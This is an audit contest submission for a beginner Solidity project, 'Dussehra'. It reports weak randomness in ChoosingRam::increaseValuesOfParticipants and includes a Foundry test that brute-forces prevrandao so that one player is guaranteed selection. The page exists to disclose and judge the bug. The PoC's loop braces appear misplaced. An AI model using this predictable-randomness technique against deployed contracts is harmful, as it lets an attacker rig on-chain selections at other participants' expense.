First Flight #17: Dussehra

First Flight #17

Beginner FriendlyFoundryNFT

100 EXP

View results

Previous Next

Submission Details

Severity: high

Valid

Weak random number generator in `ChoosingRam:increaseValuesOfParticipants`

edsardgrisel

Summary

Weak random number generator in ChoosingRam::increaseValuesOfParticipants allows anyone to immediately become ram.

Vulnerability Details

Weak random number generator in ChoosingRam::increaseValuesOfParticipants allows anyone to wait for the right combination of block.timestamp, block.prevrandao and msg.sender and can immediately become ram.
Proof of code: add this function to Dussehra.t.sol

function test_weakRNGMeansYouCanBecomeRamGauranteed() public participants {

vm.startPrank(player3);

vm.deal(player3, 1 ether);

dussehra.enterPeopleWhoLikeRam{value: 1 ether}();

vm.stopPrank();

uint256 timeStamp = 1722470400; //Date and time (GMT): Thursday, August 1, 2024 12:00:00 AM

// vm.warp(timeStamp);

uint256 prevrandao;

uint256 player1TokenId = 0;

uint256 player2TokenId = 1;

for (uint256 i = 0; i < 100; i++) {

vm.prevrandao(bytes32(i));

// console.log(

// "PRNG: ",

// uint256(keccak256(abi.encodePacked(block.timestamp, block.prevrandao, player1))) // % 2 == 0

// );

// if this condition hits, challenger will win.

if (uint256(keccak256(abi.encodePacked(block.timestamp, block.prevrandao, player1))) % 2 == 0) {

prevrandao = i;

break;

}

console.log("prevrandao: ", prevrandao);

vm.startPrank(player1);

for (uint256 i = 0; i < 5; i++) {

choosingRam.increaseValuesOfParticipants(player1TokenId, player2TokenId);

}

vm.stopPrank();

assertEq(choosingRam.selectedRam(), player1);

assertFalse(choosingRam.isRamSelected());

}

Impact

An address can guarantee they become ram in one transaction. However, due to another bug (isRamSelected not being set to true when a users nft becomes selectedRam), this bug doesn't allow a user to steal funds (gaurantee winning) because the winner can only be decided by the organizer calling ChoosingRam.sol::selectRamIfNotSelected. Therefore I put this as low risk.

Tools Used

Manual review

Recommendations

Use better randomness such as chainlink VRF.

Updates

Lead Judging Commences

bube Lead Judge over 1 year ago

Submission Judgement Published

Validated

Assigned finding tags:

Weak randomness in `ChoosingRam::increaseValuesOfParticipants`

Rewards breakdown

nSLOC

218

This contest has a flat reward structure with the following payouts:

High

100 EXP

Medium

20 EXP

Low

2 EXP

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being carefully reviewed by our judges.

View all submissions

Appeals

This is your time to appeal against judgements on your submissions.

Appeals Review

Appeals are being carefully reviewed by our judges.

Rewards Distribution

The contest is complete and the rewards are being distributed.

View results

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.